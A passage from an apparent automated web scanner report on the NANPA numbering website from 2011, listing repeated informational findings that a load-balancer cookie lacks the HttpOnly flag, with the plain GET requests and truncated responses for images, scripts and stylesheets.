Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:36 GMT
Server: Apache
Last-Modified: Fri, 21 May 2010 18:19:52 GMT
ETag: "28764-62c-4871ebcbb4200"
Accept-Ranges: bytes
Content-Length: 1580
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2886707392.20480.0000; path=/

GIF89a.........X.{Q..W.~S..U.S..T.|R..V...E.}............E.~......E.|.._E..t..E.E.|..^.....a......5.st..E....d....\%.lt.....d.....5.t5.rt..5.v.....^t..%.j........E..%.gd.....%.f5.qd.......T..E.{T
...[SNIP]...

13.77. http://www.nationalnanpa.com/content/img/nav_numRes_on.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nationalnanpa.com
Path:	/content/img/nav_numRes_on.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServernas-ns=2869930176.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/img/nav_numRes_on.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:30 GMT
Server: Apache
Last-Modified: Tue, 18 May 2010 16:16:12 GMT
ETag: "a003f-62c-486e0a8f0eb00"
Accept-Ranges: bytes
Content-Length: 1580
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/

GIF89a.........I..B..H..D..F..D..E..C..G...A.r.........A.s.........@.q.....Qq..A.u...A.rA.tA.q..P........S......A.t1.ga..!._.....Nq.....q.....a..........Pq..1.h1.j1.fq..!.]...a.. .Y...!.ZA.v0.e...a...
...[SNIP]...

13.78. http://www.nationalnanpa.com/content/img/nav_pub_off.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nationalnanpa.com
Path:	/content/img/nav_pub_off.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServernas-ns=2869930176.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/img/nav_pub_off.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:32 GMT
Server: Apache
Last-Modified: Fri, 21 May 2010 18:19:52 GMT
ETag: "a0045-542-4871ebcbb4200"
Accept-Ranges: bytes
Content-Length: 1346
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/

GIF89a.........X.{Q..W..U.S.~S..T.|R..V.........E.}...E.~E........E.E.|...E.|...E.t..t.......^..a.....5.sE.......\d.....5.qd......._%.f5.t......%.l5.vT..d..t....d..g...d..5.u%.l....^........5.w.
...[SNIP]...

13.79. http://www.nationalnanpa.com/content/img/nav_pub_on.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nationalnanpa.com
Path:	/content/img/nav_pub_on.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServernas-ns=2886707392.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/img/nav_pub_on.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:30 GMT
Server: Apache
Last-Modified: Tue, 18 May 2010 16:16:12 GMT
ETag: "28778-543-486e0a8f0eb00"
Accept-Ranges: bytes
Content-Length: 1347
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2886707392.20480.0000; path=/

GIF89a.........I..B..H..F..D..D..E..C..G............A.r...A.uA.sq..A.rA.t......A.q...@.qA.t....................P..S...A.v1.g..Q .Y..N1.ha..0.ea..!._...a.....l....Sa..l..l..q....Pl..Q....1.jq....V!.`1
...[SNIP]...

13.80. http://www.nationalnanpa.com/content/img/nav_rep_off.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nationalnanpa.com
Path:	/content/img/nav_rep_off.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServernas-ns=2886707392.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/img/nav_rep_off.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:32 GMT
Server: Apache
Last-Modified: Fri, 21 May 2010 18:19:52 GMT
ETag: "2878a-502-4871ebcbb4200"
Accept-Ranges: bytes
Content-Length: 1282
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2886707392.20480.0000; path=/

GIF89a.........X.{Q..W.~S.|R.S..U..T..V......E.}............E.|t..E..E.~.._t.......^d......a......5.s...t.....%.lE.d.......\.............d....^d..%.f...5.u5.t%.j...E.|..g5.vt..5.s%.i.........%.g5
...[SNIP]...

13.81. http://www.nationalnanpa.com/content/img/nav_rep_on.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nationalnanpa.com
Path:	/content/img/nav_rep_on.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServernas-ns=2869930176.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/img/nav_rep_on.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:33 GMT
Server: Apache
Last-Modified: Tue, 18 May 2010 16:16:12 GMT
ETag: "a0035-502-486e0a8f0eb00"
Accept-Ranges: bytes
Content-Length: 1282
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/

GIF89a.........I..B..H..D..C..D..F..E..G.........A.rq.....@.q......A.u...A.s...........Qa.......S.....P1.gq..A.ta........q....N!._......A.r...l.....!.]a..l....Pl..l.. .Y1.h...1.i..S......A.q..V!.Z....
...[SNIP]...

13.82. http://www.nationalnanpa.com/content/img/nav_tools_off.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nationalnanpa.com
Path:	/content/img/nav_tools_off.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServernas-ns=2869930176.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/img/nav_tools_off.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:32 GMT
Server: Apache
Last-Modified: Fri, 21 May 2010 18:19:52 GMT
ETag: "a0026-491-4871ebcbb4200"
Accept-Ranges: bytes
Content-Length: 1169
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/

GIF89a.........X.{Q..W.|R..T..U.S.~S..V..................t..E.}t.......5.t5.s......E..E.|..a..^..\E.~.._...%.l.....E...%.f...d.....d....d..gE.E..5.u.....^%.ht..5.r%.i...d..%.g5.v..^E.|...d......
...[SNIP]...

13.83. http://www.nationalnanpa.com/content/img/nav_tools_on.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nationalnanpa.com
Path:	/content/img/nav_tools_on.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServernas-ns=2869930176.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/img/nav_tools_on.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:35 GMT
Server: Apache
Last-Modified: Tue, 18 May 2010 16:16:12 GMT
ETag: "a0036-491-486e0a8f0eb00"
Accept-Ranges: bytes
Content-Length: 1169
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/

GIF89a.........B..I..H..C..F..E..D..D..G......q..............A.u1.g.........1.h...A.r@.q..P..Q..S...A.s..N...A.tl.. .Yl..l..l.......V!._a..q.............Sa..A.t!.[...A.vA.r!.\A.q1.i..Pa.....q..1.ja..1
...[SNIP]...

13.84. http://www.nationalnanpa.com/content/img/subContent_bg.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nationalnanpa.com
Path:	/content/img/subContent_bg.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServernas-ns=2869930176.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/img/subContent_bg.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:33 GMT
Server: Apache
Last-Modified: Fri, 21 Aug 2009 18:56:27 GMT
ETag: "a004f-5c-471ab6ce2ecc0"
Accept-Ranges: bytes
Content-Length: 92
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/

GIF89a......................................................!.......,......... . 1H .h...;

13.85. http://www.nationalnanpa.com/content/js/browser_ie.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nationalnanpa.com
Path:	/content/js/browser_ie.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServernas-ns=2886707392.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/js/browser_ie.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:27 GMT
Server: Apache
Last-Modified: Fri, 21 Aug 2009 18:56:28 GMT
ETag: "28755-248a-471ab6cf22f00"
Accept-Ranges: bytes
Content-Length: 9354
Content-Type: application/javascript
Set-Cookie: BIGipServernas-ns=2886707392.20480.0000; path=/

q58="style.visibility=\"visible\"";q59="style.visibility=\"hidden\"";q82=null;q93=null;q94=null;q95=null;strict=(q147)&&(document.compatMode=="CSS1Compat");if((q150)&&(document.doctype)){tval=document
...[SNIP]...

13.86. http://www.nationalnanpa.com/content/js/dqm_loader.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nationalnanpa.com
Path:	/content/js/dqm_loader.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServernas-ns=2886707392.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/js/dqm_loader.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:23 GMT
Server: Apache
Last-Modified: Fri, 21 Aug 2009 18:56:29 GMT
ETag: "2875f-d36-471ab6d017140"
Accept-Ranges: bytes
Content-Length: 3382
Content-Type: application/javascript
Set-Cookie: BIGipServernas-ns=2886707392.20480.0000; path=/

q18=0;q19=new Array();q61 =false;q105=null;q123=false;textSize=0;b1="window";b2="";b3="";b4="";c1="";d1="";b2="host";b3="name";c1=String.fromCharCode(99);d1=String.fromCharCode(100);if(document.all ||
...[SNIP]...

13.87. http://www.nationalnanpa.com/content/js/nanpa_nav.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nationalnanpa.com
Path:	/content/js/nanpa_nav.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServernas-ns=2869930176.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/js/nanpa_nav.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:14 GMT
Server: Apache
Last-Modified: Wed, 15 Sep 2010 18:21:30 GMT
ETag: "a0015-4331-4905066017e80"
Accept-Ranges: bytes
Content-Length: 17201
Content-Type: application/javascript
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/

// QuickMenu Pro, Copyright (c) 1998 - 2003, OpenCube Inc. - http://www.opencube.com
//
//
// QuickMenu Pro is Compatible With....
//
// IE4, IE5.x, IE6 (Win 95, 98, ME, 2000, NT, XP)
/
...[SNIP]...

13.88. http://www.nationalnanpa.com/content/styles/nanpa_css_b.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nationalnanpa.com
Path:	/content/styles/nanpa_css_b.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServernas-ns=2886707392.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/styles/nanpa_css_b.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:03 GMT
Server: Apache
Last-Modified: Fri, 21 May 2010 18:35:11 GMT
ETag: "28792-2cfd-4871ef38215c0"
Accept-Ranges: bytes
Content-Length: 11517
Content-Type: text/css
Set-Cookie: BIGipServernas-ns=2886707392.20480.0000; path=/

/* NANPA Stylesheet */
/* NeuStar (www.neustar.biz) */

/* General Site Structure */
body {
   background:#CDCDC5 url(/content/img/mainbg.gif) repeat-x top left;
   margin:0;
   padding:0;
   text-align:cente
...[SNIP]...

13.89. http://www.nationalnanpa.com/content/styles/nanpa_css_nav.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nationalnanpa.com
Path:	/content/styles/nanpa_css_nav.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServernas-ns=2869930176.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/styles/nanpa_css_nav.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:07 GMT
Server: Apache
Last-Modified: Tue, 18 May 2010 18:03:17 GMT
ETag: "a001c-6ba-486e227e6a340"
Accept-Ranges: bytes
Content-Length: 1722
Content-Type: text/css
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/

/* NANPA Stylesheet - Navigation */
/* NeuStar (www.neustar.biz) */

div.menuBar,
div.menuBar a.menuButton,
div.menu,
div.menu a.menuItem {
font-family: "MS Sans Serif", Arial, sans-serif;
font-si
...[SNIP]...

13.90. http://www.nationalnanpa.com/content/styles/nanpa_css_p.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nationalnanpa.com
Path:	/content/styles/nanpa_css_p.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServernas-ns=2869930176.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/styles/nanpa_css_p.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:04 GMT
Server: Apache
Last-Modified: Fri, 21 Aug 2009 18:56:30 GMT
ETag: "a001b-17d-471ab6d10b380"
Accept-Ranges: bytes
Content-Length: 381
Content-Type: text/css
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/

body {
   font-family: Times, Times New Roman, serif;
   font-size: 12pt;
   background-color: #fff;
   margin:5px;
}

#banner {
   height:33px;
   background-color:#006384;
}

#content {
   margin:5px;
}

a:link,
...[SNIP]...

13.91. http://www.nationalnanpa.com/nas/public/assigned_code_query_step1.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nationalnanpa.com
Path:	/nas/public/assigned_code_query_step1.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServernas-ns=2869930176.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /nas/public/assigned_code_query_step1.do?method=selectNpas HTTP/1.1
Host: www.nationalnanpa.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=82268809.1305158784.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=82268809.597827469.1305158784.1305158784.1305158784.1

Response

13.92. http://www.nationalnanpa.com/nas/public/css/images/layout/list.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nationalnanpa.com
Path:	/nas/public/css/images/layout/list.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServernas-ns=2886707392.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /nas/public/css/images/layout/list.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 00:07:14 GMT
Server: Apache
Content-Length: 1214
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Set-Cookie: BIGipServernas-ns=2886707392.20480.0000; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Draft//EN">
<HTML>
<HEAD>
<TITLE>Error 404--Not Found</TITLE>
<META NAME="GENERATOR" CONTENT="WebLogic Server">
</HEAD>
<BODY bgcolor="white">
<FONT FACE=He
...[SNIP]...

13.93. http://www.nationalnanpa.com/nas/public/css/neustar.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nationalnanpa.com
Path:	/nas/public/css/neustar.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServernas-ns=2869930176.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /nas/public/css/neustar.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:28 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 7458
Last-Modified: Tue, 11 May 2010 09:16:54 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/css
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/

body {
   margin:0;
   padding:0;
}

small.errMesg {
   FONT-WEIGHT: bold;
   FONT-SIZE: 8pt;
   COLOR: red;
FONT-FAMILY: Arial, Helvetica, Geneva, Swiss, SunSans-Regular
}

.logo {
   position: absolute;
   to
...[SNIP]...

13.94. http://www.nationalnanpa.com/nas/public/images/nanpa_hp_logo.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nationalnanpa.com
Path:	/nas/public/images/nanpa_hp_logo.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServernas-ns=2886707392.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /nas/public/images/nanpa_hp_logo.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:07:13 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 514
Last-Modified: Wed, 28 Apr 2010 15:20:28 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2886707392.20480.0000; path=/

GIF89af.!.......V.u...x.........S?4lZ......g..Exh$_L.......G1!.......,....f.!......I..8....`(.di.h..l..p,.tm.x..|n8@..P!....A......Q....."....,.....f..`.2p$....0.......f..._.
.. H...... Y..@t....mf...
...[SNIP]...

13.95. http://www.nationalnanpa.com/nas/public/images/neustar_logo.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nationalnanpa.com
Path:	/nas/public/images/neustar_logo.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServernas-ns=2886707392.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /nas/public/images/neustar_logo.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:07:13 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 1679
Last-Modified: Wed, 28 Apr 2010 15:21:12 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2886707392.20480.0000; path=/

GIF89aQ...............@..\........e.......tJ.X...............-.ro.......]..Y.....[P....__.X.....d...D..'.n..h{.X..cV.....L.....f.X.....f+.qs..c.. .Z0.td..u..F..........\........`...M..G...............
...[SNIP]...

13.96. http://www.nationalnanpa.com/nas/public/images/px_CCCCCC.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nationalnanpa.com
Path:	/nas/public/images/px_CCCCCC.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServernas-ns=2869930176.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /nas/public/images/px_CCCCCC.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:07:13 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 43
Last-Modified: Sun, 25 Jan 2004 16:15:44 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/

GIF89a.............!.......,...........D..;

13.97. http://www.nationalnanpa.com/nas/public/js/utilities.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nationalnanpa.com
Path:	/nas/public/js/utilities.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServernas-ns=2886707392.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /nas/public/js/utilities.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
